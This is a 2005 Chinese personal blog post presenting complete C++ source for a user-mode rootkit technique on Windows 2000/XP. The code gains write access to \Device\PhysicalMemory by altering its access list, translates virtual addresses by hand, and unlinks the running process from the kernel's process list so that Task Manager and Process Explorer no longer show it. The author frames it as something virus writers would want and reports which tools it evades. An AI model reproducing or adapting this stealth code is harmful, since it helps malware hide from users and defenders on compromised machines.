| « | August 2025 | » | | 日 | 一 | 二 | 三 | 四 | 五 | 六 | | | | | | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | | | | | | | |
|
公告 |
戒除浮躁,读好书,交益友 |
| Blog信息 |
|
blog名称:邢红瑞的blog
日志总数:523
评论数量:1142
留言数量:0
访问次数:9696301
建立时间:2004年12月20日 |
| |
|
 [rootkit]进程隐藏自己不被发现
原创空间, 软件技术, 电脑与网络
邢红瑞 发表于 2005/10/20 18:41:25 |
| 做到这个其实不大容易,最早看过fu_root的代码,还得需要一个驱动,做病毒的可不会给自己做一个驱动的,还好网上有现成的源代码。HideProcess.h只是一个头文件,为了引用方便,BOOL HideProcess();// hideprocess.cpp : Defines the entry point for the console application.//
#include "stdafx.h"///////////////////////////////////////////////////////////////////////////////HideProcess.cpp#include<windows.h>#include<Accctrl.h>#include<Aclapi.h>
#include"HideProcess.h"
#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK { NTSTATUS Status; ULONG Information;} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer;} UNICODE_STRING, *PUNICODE_STRING;
#define OBJ_INHERIT 0x00000002L#define OBJ_PERMANENT 0x00000010L#define OBJ_EXCLUSIVE 0x00000020L#define OBJ_CASE_INSENSITIVE 0x00000040L#define OBJ_OPENIF 0x00000080L#define OBJ_OPENLINK 0x00000100L#define OBJ_KERNEL_HANDLE 0x00000200L#define OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes );
typedef VOID (CALLBACK* RTLINITUNICODESTRING)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString );
RTLINITUNICODESTRING RtlInitUnicodeString;ZWOPENSECTION ZwOpenSection;HMODULE g_hNtDLL = NULL;PVOID g_pMapPhysicalMemory = NULL;HANDLE g_hMPM = NULL;OSVERSIONINFO g_osvi;//---------------------------------------------------------------------------BOOL InitNTDLL(){ g_hNtDLL = LoadLibrary("ntdll.dll");
if (NULL == g_hNtDLL) return FALSE;
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,
"RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
return TRUE;}//---------------------------------------------------------------------------VOID CloseNTDLL(){ if(NULL != g_hNtDLL) FreeLibrary(g_hNtDLL);
g_hNtDLL = NULL;}//---------------------------------------------------------------------------VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) { PACL pDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; DWORD dwRes = GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL,
NULL, &pDacl, NULL, &pSD);
if(ERROR_SUCCESS != dwRes) {
if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); }
EXPLICIT_ACCESS ea; RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance= NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER";
dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl); if(ERROR_SUCCESS != dwRes) {
if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } dwRes = SetSecurityInfo
(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL); if(ERROR_SUCCESS != dwRes) {
if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); }
} //---------------------------------------------------------------------------HANDLE OpenPhysicalMemory(){ NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; ULONG PhyDirectory;
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx (&g_osvi);
if (5 != g_osvi.dwMajorVersion) return NULL;
switch(g_osvi.dwMinorVersion) { case 0: PhyDirectory = 0x30000; break; //2k case 1: PhyDirectory = 0x39000; break; //xp default: return NULL; }
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
attributes.Length = sizeof(OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = &physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
if(status == STATUS_ACCESS_DENIED) { status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM); status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); }
if(!NT_SUCCESS(status)) return NULL;
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,
0x1000);
if( g_pMapPhysicalMemory == NULL ) return NULL;
return g_hMPM;}//---------------------------------------------------------------------------PVOID LinearToPhys(PULONG BaseAddress, PVOID addr){ ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr; PGDE = BaseAddress[VAddr>>22];
if (0 == (PGDE&1)) return 0;
ULONG tmp = PGDE & 0x00000080;
if (0 != tmp) { PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF); } else { PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12]; if (0 == (PTE&1)) return 0;
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF); UnmapViewOfFile((PVOID)PGDE); }
return (PVOID)PAddr;}//---------------------------------------------------------------------------ULONG GetData(PVOID addr){ ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &0xfffff000, 0x1000); if (0 == tmp) return 0;
ULONG ret = tmp[(phys & 0xFFF)>>2]; UnmapViewOfFile(tmp);
return ret;}//---------------------------------------------------------------------------BOOL SetData(PVOID addr,ULONG data){ ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (0 == tmp) return FALSE;
tmp[(phys & 0xFFF)>>2] = data; UnmapViewOfFile(tmp);
return TRUE;}//---------------------------------------------------------------------------long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp){ ExitProcess(0); return 1 ;}//---------------------------------------------------------------------------BOOL YHideProcess(){// SetUnhandledExceptionFilter(exeception);
if (FALSE == InitNTDLL()) return FALSE;
if (0 == OpenPhysicalMemory()) return FALSE;
ULONG thread = GetData((PVOID)0xFFDFF124); //kteb ULONG process = GetData(PVOID(thread + 0x44)); //kpeb
ULONG fw, bw; if (0 == g_osvi.dwMinorVersion) { fw = GetData(PVOID(process + 0xa0)); bw = GetData(PVOID(process + 0xa4)); }
if (1 == g_osvi.dwMinorVersion) { fw = GetData(PVOID(process + 0x88)); bw = GetData(PVOID(process + 0x8c)); } SetData(PVOID(fw + 4), bw); SetData(PVOID(bw), fw);
CloseHandle(g_hMPM); CloseNTDLL();
return TRUE;}
BOOL HideProcess(){static BOOL b_hide = false;if (!b_hide){ b_hide = true; YHideProcess(); return true;}return true;}测试任务管理器和procxp都可以用骗过去,发现骗不过去icesword,还是红色背景。 |
|
|